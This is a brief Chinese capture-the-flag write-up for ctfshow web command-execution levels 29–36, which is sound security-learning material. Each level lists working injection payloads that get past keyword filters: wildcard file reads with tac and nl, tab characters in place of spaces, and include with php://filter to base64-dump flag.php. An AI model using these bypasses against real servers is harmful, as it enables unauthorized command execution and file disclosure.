ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
CC城子8 分钟前
EtherNet/IP I/O 丢包排查(linux系统)
linux·单片机·tcp/ip·ethernetip
新时代牛马11 分钟前
Linux 信号处理完整篇:从sigaction、掩码到内核发送与可重入排障
linux·运维·信号处理
lpfasd12318 分钟前
Docker存储清理与防膨胀实践
运维·docker·容器
每天被AI救一次19 分钟前
WorkBuddy 会议自动化实战:从腾讯会议转写到待办系统的完整链路(附全套提示词)
运维·自动化·腾讯会议
程序员梅雨23 分钟前
Linux & Shell 实用干货
linux·运维·服务器·后端·面试·php
吴声子夜歌29 分钟前
编写Shell脚本——自顶向下设计
linux·运维·shell
M78佐菲43 分钟前
HTML学习笔记
linux·笔记·学习·tcp/ip·html
XR1234567881 小时前
医院无线整网高密覆盖选型深度解析
运维·网络
新时代牛马1 小时前
嵌入式 Linux 蓝牙框架完整篇:从 HCI、L2CAP 到BlueZ 用户态
linux·运维·服务器
Brilliantwxx1 小时前
【STM32】 初认识USART串口
linux·stm32·单片机·嵌入式硬件·架构